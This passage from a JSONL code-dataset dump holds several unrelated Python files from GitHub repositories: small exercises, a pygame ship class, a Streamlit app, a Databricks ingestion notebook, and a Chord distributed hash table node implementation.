Moreover, we will probably need them in the future\n        self.max_retries = 3\n\n        self.json_output_file = \"./output\"\n\n        self.scan_subdirs = None\n        self.exclude_subdirs = None\n\n        self.redirect = redirect\n        self.request_by_name = True\n\n        self.lowercase = False\n\n        self.use_random_agents = False\n        self.test_fail_path = \"\"\n","repo_name":"c0rv4x/project-black","sub_path":"black/workers/dirsearch/dirsearch_ext/lib/core/ArgumentParser.py","file_name":"ArgumentParser.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":286,"dataset":"github-code","pt":"72"}
+{"seq_id":"833022372","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport discord\nimport aiohttp\nimport asyncio\n\nfrom discord.ext import commands\n\n\nclass Bigemoji:\n    def __init__(self, client):\n        self.client = client\n        self.session = aiohttp.ClientSession()\n\n\n    print(\"Loading Bigemoji...\")\n\n    async def on_message(self, message):\n        # Message author variables\n        user_id = message.author.id\n        user_name = message.author\n\n\ndef setup(client):\n    client.add_cog(Bigemoji(client))\n","repo_name":"Mehvix/synapsBot","sub_path":"bigemoji.py","file_name":"bigemoji.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"15452895119","text":"\n\nnumbers = []\nfor x in range (1000, 3001):\n    split = [int(d) for d in str(x)]\n    odd = False\n    for y in range (0, len(split)):\n        if split[y] % 2 != 0:\n            odd = True\n    if (odd == False):\n        numbers.append(x)\nprint(numbers)","repo_name":"ayusharoraa/python-code","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"16227461783","text":"# -*- encoding:utf-8 -*-\nimport pandas as pd\n# Data inspection\n# Commonly used read_csv parameters are explained at https://www.jianshu.com/p/366aa5daaba9\ndata = pd.read_csv(\"8.Regression/8.Advertising.csv\")\ndata.head()\ndata.info()\n\n\n# Data preprocessing\n# Missing-value handling\n# Standardization and normalization\n# Encoding; PCA dimensionality reduction\n# Feature extraction: text features (see the feature_select file)\n\n\n\n\n\n# Grid search\n\n\n\n\n\n\n","repo_name":"keepingoner/ml","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"30579913840","text":"import pygame\nfrom Clases import Bullet\nimport os\n\nclass SpaceShip(pygame.sprite.Sprite):\n\tdef __init__(self, WIDTH, HEIGHT):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.SPSHIMAGE = pygame.image.load(os.path.join('Images', 'nave.jpg'))\n\t\tself.EXPIMAGE = pygame.image.load(os.path.join('Images', 'explosion.jpg'))\n\t\t\n\t\tself.RECT = self.SPSHIMAGE.get_rect()\n\t\tself.RECT.centerx = WIDTH/2\n\t\tself.RECT.centery = HEIGHT - 30\n\n\t\tself.SHOOTLIST = []\n\t\tself.HEALTH = True \n\n\t\tself.VEL = 20\n\n\t\tself.SOUND_SHOOT = pygame.mixer.Sound(\"Sounds/shoot.wav\")\n\t\tself.SOUND_EXP = pygame.mixer.Sound(\"Sounds/gameover.wav\")\n\n\n\tdef MovementRight(self):\n\t\tself.RECT.right += self.VEL\n\t\tself.__movement()\n\n\tdef MovementLeft(self):\n\t\tself.RECT.left -= self.VEL\n\t\tself.__movement()\n\n\tdef __movement(self):\n\t\tif self.HEALTH == True:\n\t\t\tif self.RECT.left <= 0:\n\t\t\t\tself.RECT.left = 0\n\t\t\telif self.RECT.left > 870:\n\t\t\t\tself.RECT.left = 840\n\n\tdef Shoot(self, x, y):\n\t\t
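# spawn a bullet at (x, y), keep a reference to it, and play the firing sound\n\t\t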
MY_BULLET = Bullet.Bullet(x,y,\"Images/disparoa.jpg\",True)\n\t\tself.SHOOTLIST.append(MY_BULLET)\n\t\tself.SOUND_SHOOT.play()\n\n\tdef Destruction(self):\n\t\tself.SOUND_EXP.play()\n\t\tself.HEALTH = False\n\t\tself.VEL = 0\n\t\tself.SPSHIMAGE = self.EXPIMAGE\n\n\tdef Draw(self, WIN):\n\t\tWIN.blit(self.SPSHIMAGE, self.RECT)","repo_name":"LauRivero150920/PygameTutorial","sub_path":"Pygame1/Clases/SpaceShip.py","file_name":"SpaceShip.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36716979280","text":"import streamlit as st\n\nfrom src import home, cleans, people, money, supports\n\ndef init():\n    st.session_state.pages = {\n        '🏠 Home': home.main,\n        '🧹 Cleaning schedule': cleans.main,\n        '🙍 People management': people.main,\n        '💰 Money management': money.main,\n        '🤖 Support': supports.main\n    }\n\ndef draw_style():\n    st.set_page_config(page_title = 'Shared house management',\n                       page_icon = '🏠',\n                       layout = 'wide',\n                       menu_items = {\n                           'Get help': 'https://www.facebook.com/chienlady/',\n                           'Report a Bug': 'https://www.facebook.com/chienlady/',\n                           'About': 'A website for private, **non-profit** use.'\n                       })\n\n    style = '''\n        \n    '''\n    st.markdown(style, unsafe_allow_html = True)\n\ndef load_page(page_name):\n    st.session_state.pages[page_name]()\n\ndef main():\n    init()\n    draw_style()\n    with st.sidebar:\n        st.markdown('# House management menu')\n        st.image('https://media.giphy.com/media/cYxRo3zzej4vTAcd4r/giphy.gif')\n        page = st.selectbox('Choose a destination',\n                            ('🏠 Home',\n                             '🧹 Cleaning schedule',\n                             '🙍 People management',\n                             '💰 Money management',\n                             '🤖 Support'),\n                            key = 'choose_page')\n    load_page(page)\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"ChienLady/st-web","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10482240579","text":"from __future__ import print_function\nimport os\nimport sys\nimport re\nimport codecs\n\n\ndef processFile(filepath):\n    fp = codecs.open(filepath, 'rU', 'iso-8859-2')\n\n    content = fp.read()\n    \n    totalNumberOfEmails = 0\n    totalNumberOfDates = 0\n    totalNumberOfFloats = 0\n    totalNumberOfIntegers = 0\n    totalNumberOfAbbreviations = 0\n    totalNumberOfSentences = 0 \n    authorName = \"\"\n    keywords = \"\"\n    \n    for emailResult in re.finditer(r'[A-Z0-9a-z._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}', content):\n        #print(emailResult.group())\n        totalNumberOfEmails += 1\n\n    for text in re.finditer(r'

<P[^>]*>(.*?)<\\/P>', content, re.M | re.DOTALL):  # NOTE: the <P> opening pattern is an assumed reconstruction; the original tag was stripped from the source\r\n        #rrrr-dd-mm or rrrr/dd/mm or rrrr.dd.mm\r\n        for dateResult in re.finditer(r'([12]\\d{3}[-./](0[1-9]|[12]\\d|3[01])[-./](0[1-9]|1[0-2]))', text.group(1)):\r\n            #print(dateResult.group())\r\n            totalNumberOfDates += 1\r\n        #dd-mm-rrrr or dd/mm/rrrr or dd.mm.rrrr\r\n        for dateResult in re.finditer(r'((0[1-9]|[12]\\d|3[01])[-./](0[1-9]|1[0-2])[-./][12]\\d{3})', text.group(1)):\r\n            #print(dateResult.group())\r\n            totalNumberOfDates += 1\r\n        for floatResult in re.finditer(r'[-+]?[0-9]*\\.[0-9]+([eE][-+]?[0-9]+)?', text.group(1), re.DOTALL):\r\n            #print(floatResult.group())\r\n            totalNumberOfFloats += 1\r\n        for abbreviationResult in re.finditer(r'\\s([A-Za-z]{1,3}[.])', text.group(1)):\r\n            #print(abbreviationResult.group())\r\n            totalNumberOfAbbreviations += 1\r\n        for integerResult in re.finditer(r'([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])', text.group(1)):\r\n            #print(integerResult.group())\r\n            totalNumberOfIntegers += 1\r\n        for sentencesResult in re.finditer(r'([A-Z][^\\.!?]*[\\.!?])', text.group(1), re.DOTALL | re.M):\r\n            #print(sentencesResult.group())\r\n            totalNumberOfSentences += 1\r\n\r\n\r\n    authorResult = re.search(r'<META NAME=\"AUTHOR\" CONTENT=\"(.*?)\">', content)  # NOTE: assumed reconstruction; the original author pattern was stripped\r\n    if authorResult:\r\n        #print(authorResult.group(1))\r\n        authorName = authorResult.group(1)\r\n    \r\n    for keywordResult in re.finditer(r' 0:\n    n_racks = order(clothes, rack_capacity)\n\nprint(n_racks)\n","repo_name":"h-dmt/Python_Advanced","sub_path":"1_stacks_queues/Fashion_boutique.py","file_name":"Fashion_boutique.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"17848450500","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ### Accessing Azure Data Lake using Access Keys ###\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\", \"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\n# COMMAND ----------\n\n# MAGIC %run \"./includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"./includes/common_functions\"\n\n# COMMAND ----------\n\nhs_account_key = dbutils.secrets.get(scope = 'hs-scopesecret-hs', key = 'storageaccountkey')\n\n# COMMAND ----------\n\nspark.conf.set(\n    \"fs.azure.account.key.learningdatabrickstorage.dfs.core.windows.net\",\n    hs_account_key\n)\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(f\"{raw_folder_path}\"))\n\n# COMMAND ----------\n\ndisplay(spark.read.csv(f\"{raw_folder_path}/pit_stops.json\"))\n\n# COMMAND ----------\n\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType, DoubleType, FloatType, DateType\nfrom pyspark.sql.functions import col, current_timestamp\n\n# COMMAND ----------\n\npitstops_schema = StructType(fields=[StructField(\"raceId\", IntegerType(), False),\n                                     StructField(\"driverId\", IntegerType(), True),\n                                     StructField(\"stop\", StringType(), True),\n                                     StructField(\"lap\", IntegerType(), True),\n                                     StructField(\"time\", StringType(), True),\n                                     StructField(\"duration\", StringType(), True),\n                                     StructField(\"milliseconds\", IntegerType(), True)\n])\n\n# COMMAND ----------\n\npitstops_df = spark.read \\\n    .option(\"multiline\", True) \\\n    .schema(pitstops_schema) \\\n    .json(f\"{raw_folder_path}/pit_stops.json\")\n\n# COMMAND ----------\n\ndisplay(pitstops_df)\n\n# COMMAND ----------\n\nrenamed_pitstops_df = pitstops_df.withColumnRenamed(\"raceId\", \"race_id\") \\\n    .withColumnRenamed(\"driverId\", \"driver_id\") \\\n    .withColumn(\"ingestion_date\", current_timestamp())\n\n# COMMAND 
----------\n\nrenamed_pitstops_df.printSchema()\n\n# COMMAND ----------\n\nrenamed_pitstops_df.schema.names\n\n# COMMAND ----------\n\nspark.conf.set(\"spark.sql.sources.partitionOverwriteMode\", \"dynamic\")\n\n# COMMAND ----------\n\n# NOTE: the select below references result columns from another notebook and 'results_dropped_df'\n# is never defined here, so it is left commented out\n# results_dropped_df = results_dropped_df.select(\"result_id\", \"driver_id\", \"constructor_id\", \"number\", \"grid\", \"position\", \"position_text\",\n#                                                \"position_order\", \"points\", \"laps\", \"time\", \"milliseconds\", \"fastest_lap\", \"rank\", \"fastest_lap_time\",\n#                                                \"fastest_lap_speed\", \"file_date\", \"ingestion_date\", \"race_id\")\n\n# COMMAND ----------\n\n#renamed_pitstops_df.write.mode(\"overwrite\").parquet(f\"{processed_folder_path}/pit_stops\")\nrenamed_pitstops_df.write.mode(\"overwrite\").format(\"parquet\").saveAsTable(\"f1_processed.pit_stops\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC SELECT * FROM f1_processed.pit_stops;\n\n# COMMAND ----------\n\ndisplay(spark.read.parquet(f\"{processed_folder_path}/pit_stops\"))\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"Success\")\n","repo_name":"hserovsk/DataBricksAzure","sub_path":"ingestion/6.ingest_pit_stops.py","file_name":"6.ingest_pit_stops.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36441523455","text":"#!/usr/bin/env python3\n\nimport sys\nimport random\n\ndef cmdlinearg(name, default=None):\n    for arg in sys.argv:\n        if arg.startswith(name + \"=\"):\n            return arg.split(\"=\")[1]\n    assert default is not None, name\n    return default\n\nseed = int(cmdlinearg('seed', sys.argv[-1]))\nrandom.seed(seed)\nL = int(cmdlinearg('len'))\n\nprint(''.join(random.choice(['S', 'N', 'B']) for _ in range(L)))\n","repo_name":"Kodsport/swedish-olympiad-2013","sub_path":"final/skolvagen/data/gen_random.py","file_name":"gen_random.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"11483466652","text":"\"\"\"\nCPSC 5520, Seattle University\nAuthor: Leila Mirzaei\nCreated Date: Nov 18th 2022\n\nThis program implements the Chord protocol (described here: https://pdos.csail.mit.edu/papers/chord:sigcomm01/chord_sigcomm.pdf)\nThe Chord software takes the form of a library to be linked with the client and server applications\nthat use it. 
The application interacts with Chord in two main ways:\n    First, Chord provides a lookup(key) algorithm that yields the IP address of the node\n    responsible for the key.\n\n    Second, the Chord software on each node notifies the application of changes in the set of\n    keys that the node is responsible for when a new node joins.\n\nThis program also allows a querier to talk to any arbitrary node in the network to query a\nvalue for a given key or add a key/value pair (with replacement).\n\n\nThe `chord_node.py` module takes a port number of an existing node (or 0 to indicate it should start a new network).\nThen, it joins a new node into the network using a system-assigned port number for itself.\nThe node joins and then listens for incoming connections (from other nodes or queriers).\nFor listening it uses a blocking TCP socket and pickle for marshaling the messages.\n\"\"\"\nfrom datetime import datetime\n\nimport hashlib\nimport pickle\nimport socket\nimport sys\nimport threading\n\nM = 7  # the network has at most 128 possible nodes (M=7, node count = 2**7 = 128)\nNODES = 2 ** M\nBUF_SZ = 4096  # socket recv arg\nBACKLOG = 100  # socket listen arg\nTEST_BASE = 43500\n\n\nclass ModRange(object):\n    \"\"\"\n    Range-like object that wraps around 0 at some divisor using modulo arithmetic.\n\n    >>> mr = ModRange(1, 4, 100)\n    >>> mr\n    <mr[1,4)%100>\n    >>> 1 in mr and 2 in mr and 4 not in mr\n    True\n    >>> [i for i in mr]\n    [1, 2, 3]\n    >>> mr = ModRange(97, 2, 100)\n    >>> 0 in mr and 99 in mr and 2 not in mr and 97 in mr\n    True\n    >>> [i for i in mr]\n    [97, 98, 99, 0, 1]\n    >>> [i for i in ModRange(0, 0, 5)]\n    [0, 1, 2, 3, 4]\n    \"\"\"\n\n    def __init__(self, start, stop, divisor):\n        self.divisor = divisor\n        self.start = start % self.divisor\n        self.stop = stop % self.divisor\n        # we want to use ranges to make things speedy, but if it wraps around the 0 node, we have to use two\n        if self.start < self.stop:\n            self.intervals = (range(self.start, self.stop),)\n        elif self.stop == 0:\n            self.intervals = (range(self.start, self.divisor),)\n        else:\n            self.intervals = (range(self.start, self.divisor), range(0, self.stop))\n\n    def __repr__(self):\n        \"\"\" Something like the interval|node charts in the paper \"\"\"\n        return '<mr[{},{})%{}>'.format(self.start, self.stop, self.divisor)  # format reconstructed; the original <...> text was stripped\n\n    def __contains__(self, id):\n        \"\"\" Is the given id within this finger's interval? 
\"\"\"\n        for interval in self.intervals:\n            if id in interval:\n                return True\n        return False\n\n    def __len__(self):\n        total = 0\n        for interval in self.intervals:\n            total += len(interval)\n        return total\n\n    def __iter__(self):\n        return ModRangeIter(self, 0, -1)\n\n\nclass ModRangeIter(object):\n    \"\"\" Iterator class for ModRange \"\"\"\n\n    def __init__(self, mr, i, j):\n        self.mr, self.i, self.j = mr, i, j\n\n    def __iter__(self):\n        return ModRangeIter(self.mr, self.i, self.j)\n\n    def __next__(self):\n        if self.j == len(self.mr.intervals[self.i]) - 1:\n            if self.i == len(self.mr.intervals) - 1:\n                raise StopIteration()\n            else:\n                self.i += 1\n                self.j = 0\n        else:\n            self.j += 1\n        return self.mr.intervals[self.i][self.j]\n\n\nclass FingerEntry(object):\n    \"\"\"\n    Row in a finger table.\n\n    >>> fe = FingerEntry(0, 1)\n    >>> fe\n    <1..2|None>\n    >>> fe.successor = 1\n    >>> fe\n    <1..2|1>\n    >>> 1 in fe, 2 in fe\n    (True, False)\n    >>> FingerEntry(0, 2, 3), FingerEntry(0, 3, 0)\n    (<2..4|3>, <4..8|0>)\n    >>> FingerEntry(3, 1, 0), FingerEntry(3, 2, 0), FingerEntry(3, 3, 0)\n    (<4..5|0>, <5..7|0>, <7..11|0>)\n    >>> fe = FingerEntry(3, 3, 0)\n    >>> 7 in fe and 0 in fe and 2 in fe and 3 not in fe\n    True\n    \"\"\"\n\n    def __init__(self, n, k, node=None):\n        if not (0 <= n < NODES and 0 < k <= M):\n            raise ValueError('invalid finger entry values')\n        self.start = (n + 2 ** (k - 1)) % NODES\n        self.next_start = (n + 2 ** k) % NODES if k < M else n\n        self.interval = ModRange(self.start, self.next_start, NODES)\n        self.successor = node  # This is the next active node. That is, what would\n        # the node be if I wanted to store data in this interval?\n\n    def __repr__(self):\n        \"\"\" Something like the interval|node charts in the paper \"\"\"\n        return '<{}..{}|{}>'.format(self.start, self.next_start, self.successor)  # format reconstructed; the original <...> text was stripped\n\n    def __contains__(self, id):\n        \"\"\" Is the given id within this finger's interval? \"\"\"\n        return id in self.interval\n\n\ndef sha1_hash(id_string):\n    result = hashlib.sha1(id_string.encode())\n    return int(result.hexdigest(), 16)\n\n\nclass ChordNode(object):\n    def __init__(self, port_number):\n        self.port_number = 0 if port_number > 0 else TEST_BASE\n        self.if_first = True if port_number == 0 else False\n        self.predecessor = None\n        self.keys = {}  # dictionary to store data\n        self.identifier = None\n        self.node = None\n        self.node_socket = None\n        threading.Thread(target=self.start_listening).start()\n        self.finger_table = self.initialize_empty_finger_table()\n        if self.if_first:\n            self.join()\n        else:\n            endpoint_string = '127.0.0.0' + str(port_number)  # must match the endpoint string hashed in initialize_empty_finger_table\n            node_p = {'number': sha1_hash(endpoint_string) % 2 ** M, 'port': port_number}\n            self.join(node_p)\n\n    def start_listening(self):\n        \"\"\"\n        This function starts a listener socket for handling incoming RPC requests.\n        It waits to accept requests.\n        When it receives a request, it starts a thread, runs an RPC handler function on the\n        new thread, and then returns to listening mode.\n        :return:\n        \"\"\"\n        try:\n            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:\n                self.node_socket = listener\n                self.node_socket.bind(('localhost', self.port_number))\n                self.node_socket.setblocking(True)\n                self.node_socket.listen()\n                self.port_number = self.node_socket.getsockname()[1]\n                print('Node just started listening on port {}.'.format(self.port_number))\n                while True:\n                    client, client_addr = self.node_socket.accept()\n                    threading.Thread(target=self.handle_rpc, args=(client,)).start()\n        except Exception as e:\n            print(\"Error occurred in starting a listener server for the node: {}. 
Error = {}\".format(self.node, e))\n\n def initialize_empty_finger_table(self):\n \"\"\"\n Each node maintains a finger table with (at most) M entries.\n The finger table is used to speed up the routing of query requests.\n For example if node identifier is 1 and M = 4 then node 1 puts 2,3,5,9 in its finger table:\n Finger Table for node 1:\n entry.start = 2 \t entry.stop = 3 \t entry.next_start = 3\n entry.start = 3 \t entry.stop = 5 \t entry.next_start = 5\n entry.start = 5 \t entry.stop = 9 \t entry.next_start = 9\n entry.start = 9 \t entry.stop = 1 \t entry.next_start = 1\n\n Finger Table for node 5:\n entry.start = 6 \t entry.stop = 7 \t entry.next_start = 7\n entry.start = 7 \t entry.stop = 9 \t entry.next_start = 9\n entry.start = 9 \t entry.stop = 13 \t entry.next_start = 13\n entry.start = 13 \t entry.stop = 5 \t entry.next_start = 5\n\n Finger Table for node 13:\n entry.start = 14 \t entry.stop = 15 \t entry.next_start = 15\n entry.start = 15 \t entry.stop = 1 \t entry.next_start = 1\n entry.start = 1 \t entry.stop = 5 \t entry.next_start = 5\n entry.start = 5 \t entry.stop = 13 \t entry.next_start = 13\n\n\n A finger table entry includes both the Chord identifier and the\n address (port number) of the relevant node.\n For each node, this program uses the string of node endpoint\n name (including local host IP and port number) then use SHA-1 to\n hash it (similar to what is suggested in the Stoica, et al. paper).\n :return: an empty finger table\n \"\"\"\n while self.node_socket is None or self.port_number == 0:\n continue\n endpoint_string = '127.0.0.0' + str(self.port_number)\n self.identifier = sha1_hash(endpoint_string)\n self.node = self.identifier % (2 ** M)\n finger_table = [None] + [FingerEntry(self.node, k) for k in range(1, M + 1)] # indexing starts at 1\n return finger_table\n\n def join(self, node_p=None):\n \"\"\"\n This function joins this node to the Chord network.\n It takes an existing node as input, but if the input is None, it indicates that this\n is the first node in the Chord network and does not need to communicate with other\n nodes to notify and update them about its joining.\n When a node n joins the network, certain keys previously assigned to n’s successor\n now become assigned to n. To perform this, Chord node must perform three tasks when\n a node n joins the network:\n 1. Initialize the predecessor and fingers of node n\n 2. Update the fingers and predecessors of existing nodes to reflect\n the addition of n\n 3. Notify the higher layer software so that it can transfer state\n (e.g. values) associated with keys that node is now responsible for.\n\n :param node_p: this is an arbitrary node in the network that this current node\n learns its predecessor and fingers by asking it to look them up.\n In the Stoica, et al. 
paper it is said that \"We assume that the new node learns\n the identity of an existing Chord node by some external mechanism.\"\n In this program the port of other node in the Chord network is given as input.\n \"\"\"\n if node_p is not None:\n self.init_finger_table(node_p)\n self.update_others() # Move keys in (predecessor, node] from successor\n\n else: # this is the only (first) node joining in the network\n for i in range(1, M + 1):\n self.finger_table[i].successor = {'number': self.node, 'port': self.port_number}\n self.predecessor = {'number': self.node, 'port': self.port_number}\n print('Node {} just joined the Chord network and listening on port {}'.format(self.node, self.port_number))\n print(\"--------------Finger table node {} after join:--------------\".format(self.node))\n self.print_finger_table()\n self.print_node_info()\n\n def call_rpc(self, other_node, method, arg1=None, arg2=None):\n \"\"\"\n This function calls other nodes in the network. It performs the rpc and receives the response.\n\n :param other_node: the address of the other nodes\n :param method: the remote function that should be called via rpc\n :param arg1: the first argument for the remote function\n :param arg2: the second argument for the remote function\n :return: the remote function's return value(s) or output\n \"\"\"\n if other_node == self.port_number:\n result = self.dispatch_rpc(method, arg1, arg2)\n return result\n client = ('localhost', other_node)\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as requester:\n requester.settimeout(1500)\n requester.connect(client)\n requester.sendto(pickle.dumps((method, arg1, arg2)), client)\n # print('calling receive & waiting to get result from {} for method {}'.format(other_node, method))\n response = requester.recv(BUF_SZ)\n return pickle.loads(response)\n except Exception as e:\n print(\"I'm node {}, Exception occurred in call function via rpc: {}\".format(self.node, e))\n exit()\n\n def handle_rpc(self, client):\n \"\"\"\n This function handles rpc requests from other nodes in the network and also clients and responds to them.\n\n :param client: is the network node or client that sent the rpc request.\n \"\"\"\n try:\n rpc = client.recv(BUF_SZ)\n method, arg1, arg2 = pickle.loads(rpc)\n result = self.dispatch_rpc(method, arg1, arg2)\n client.sendall(pickle.dumps(result))\n except Exception as e:\n print(\"I'm node {}, Exception occurred in call function via rpc: {}\".format(self.node, e))\n exit()\n\n def dispatch_rpc(self, method, arg1, arg2):\n if method == 'successor':\n return self.successor\n if method == 'update_finger_table':\n # arg1 = node details(identifier) and arg2 = index\n if arg1 is None or arg2 is None:\n print(\"Argument for calling `update_finger_table` method is not provided.\")\n exit()\n else:\n self.update_finger_table(arg1, arg2)\n elif method == 'find_predecessor':\n if arg1['number'] == self.node:\n return self.predecessor\n else:\n return self.find_predecessor(arg1)\n elif method == 'update_your_predecessor':\n if arg1 is None:\n print(\"Argument for calling `update_your_predecessor` method is not provided.\")\n exit()\n self.predecessor = arg1\n elif method == 'find_successor':\n if arg1 is None:\n print(\"Argument for calling `find_successor` method is not provided.\")\n exit()\n return self.find_successor(arg1)\n elif method == 'closest_preceding_finger':\n if arg1 is None:\n print(\"Argument for calling `closest_preceding_finger` method is not provided.\")\n exit()\n return 
self.closest_preceding_finger(arg1)\n        elif method == 'populate':\n            if arg1 is None:\n                print(\"Argument for calling `save_data` method is not provided.\")\n                return \"The row to populate is either missing or incorrect.\"\n            return self.save_data(arg1)\n        elif method == 'put_key':\n            return self.put_key(arg1, arg2)\n        elif method == 'query':\n            if arg1 is None or arg2 is None:\n                print(\"Arguments for calling `get_data` method are not provided.\")\n                return \"Pass the player id and year to find the row.\"\n            return self.query_data(arg1, arg2)\n        elif method == 'get_key':\n            return self.get_key(arg1)\n\n    @property\n    def successor(self):\n        return self.finger_table[1].successor\n\n    @successor.setter\n    def successor(self, id_dic):\n        self.finger_table[1].successor = id_dic\n\n    def find_successor(self, id):\n        \"\"\" Ask this node to find id's successor = successor(predecessor(id))\"\"\"\n        node_p = self.find_predecessor(id)\n        return self.call_rpc(node_p['port'], 'successor')\n\n    def find_predecessor(self, id):\n        node_p_number = self.node\n        node_p_successor = self.successor\n        node_p_port = self.port_number\n        while id not in ModRange(node_p_number + 1, node_p_successor['number'] + 1, NODES):\n            node_p = self.call_rpc(node_p_port, 'closest_preceding_finger', id)  # np = np.closest_preceding_finger(id)\n\n            node_p_number = node_p['number']\n            node_p_port = node_p['port']\n            # query the node we just hopped to (not the previous one) for its successor\n            node_p_successor = self.call_rpc(node_p_port, 'successor')\n\n        return {'number': node_p_number, 'port': node_p_port}\n\n    def closest_preceding_finger(self, id):\n        for i in range(M, 0, -1):\n            if self.finger_table[i].successor['number'] in ModRange(self.node + 1, id, NODES):\n                return self.finger_table[i].successor\n        return {'number': self.node, 'port': self.port_number}\n\n    def init_finger_table(self, node_p):\n        \"\"\"\n        This function updates the values of entries in the finger table of the local node.\n        It also updates the predecessor.\n\n        :param node_p: is an arbitrary node already in the network\n        \"\"\"\n        self.finger_table[1].successor = self.call_rpc(node_p['port'], 'find_successor', self.finger_table[\n            1].start)  # node_p.find_successor(self.finger_table[1].start)\n        self.predecessor = self.call_rpc(self.successor['port'], 'find_predecessor',\n                                         self.successor)  # self.predecessor = self.successor.predecessor\n        self.call_rpc(self.successor['port'], 'update_your_predecessor',\n                      {'number': self.node, 'port': self.port_number})  # self.successor.predecessor = self.node\n        for i in range(1, M):\n            if self.finger_table[i + 1].start in ModRange(self.node, self.finger_table[i].successor['number'], NODES):\n                # self.node <= self.finger_table[i + 1].start < self.finger_table[i].successor['number']:\n                self.finger_table[i + 1].successor = self.finger_table[i].successor\n            else:\n                self.finger_table[i + 1].successor = self.call_rpc(node_p['port'], 'find_successor', self.finger_table[\n                    i + 1].start)  # node_p.find_successor(self.finger_table[i + 1].start)\n\n    def update_finger_table(self, s, i):\n        \"\"\"\n        This function updates this node's finger table with s, if s is the i-th finger of it\n        :param s: new node for entry i\n        :param i: the index of finger table\n        \"\"\"\n        if self.finger_table[i].start != self.finger_table[i].successor['number'] \\\n                and s['number'] in \\\n                ModRange(self.finger_table[i].start, self.finger_table[i].successor['number'], NODES):\n            self.finger_table[i].successor = s\n            p = self.predecessor  # get first node preceding this local node\n            self.call_rpc(p['port'], 'update_finger_table', s, i)\n            print(\"--------------Finger table node {} after 
update:--------------\".format(self.node))\n self.print_finger_table()\n self.print_node_info()\n\n def update_others(self):\n \"\"\"\n This function updates all nodes whose finger tables should refer to this local node\n \"\"\"\n for i in range(1, M + 1):\n # find the last node p whose i-th finger might be this local node\n node_p = self.find_predecessor((1 + self.node - 2 ** (i - 1) + NODES) % NODES)\n # node_p.update_finger_table(self.node, i)\n self.call_rpc(node_p['port'], 'update_finger_table', {'number': self.node, 'port': self.port_number}, i)\n\n def put_key(self, key_id, key_value):\n \"\"\"\n This function updates the keys dictionary and adds or stores the new item given by the populate request.\n\n :return: True, indicates the pair successfully added\n \"\"\"\n self.keys[key_id] = key_value\n self.print_keys_dictionary()\n self.print_node_info()\n return True\n\n def get_key(self, key_id):\n \"\"\"\n This function replies to the query question by returning the data row in the\n keys dictionary for 'key_id,' or None if the keys dictionary does not contain\n a pair with key equal to the input id.\n \"\"\"\n if key_id not in self.keys.keys():\n print(\"This id is not available in node {} keys dictionary\".format(self.node))\n return None\n return self.keys[key_id]\n\n def save_data(self, input):\n \"\"\"\n This function save the input row in the appropriate node of the Chord network.\n As identifier or key of this row, the node uses the value in the first column (player id) concatenated\n with the value in the fourth column (year).\n :param input: data row in list format\n :return: a string describing the result of populating the input data row\n \"\"\"\n row = input\n player_id = row[0]\n year = row[3]\n data_id = sha1_hash(str(player_id) + str(year))\n bucket_id = data_id % 2 ** M\n responsible = self.call_rpc(self.port_number, 'find_successor', bucket_id)\n done = self.call_rpc(responsible['port'], 'put_key', data_id, row)\n if done:\n return \"Node {} saved the row\".format(responsible['number'])\n else:\n return \"Populate failed\"\n\n def query_data(self, player_id, year):\n \"\"\"\n This function finds the node in charge of keeping a row with the given\n player id and year and retrieves the row from that node.\n\n :param player_id: first part of the identifier for a row\n :param year: second part of the identifier for a row\n :return: a row or a string describing the result of query result\n \"\"\"\n data_id = sha1_hash(str(player_id) + str(year))\n bucket_id = data_id % 2 ** M\n responsible = self.call_rpc(self.port_number, 'find_successor', bucket_id)\n try:\n row = self.call_rpc(responsible['port'], 'get_key', data_id)\n if row is None:\n return \"Data is not available.\"\n if isinstance(row, list):\n return row\n else:\n return \"Query failed!\"\n except Exception as e:\n print(\"Query failed! 
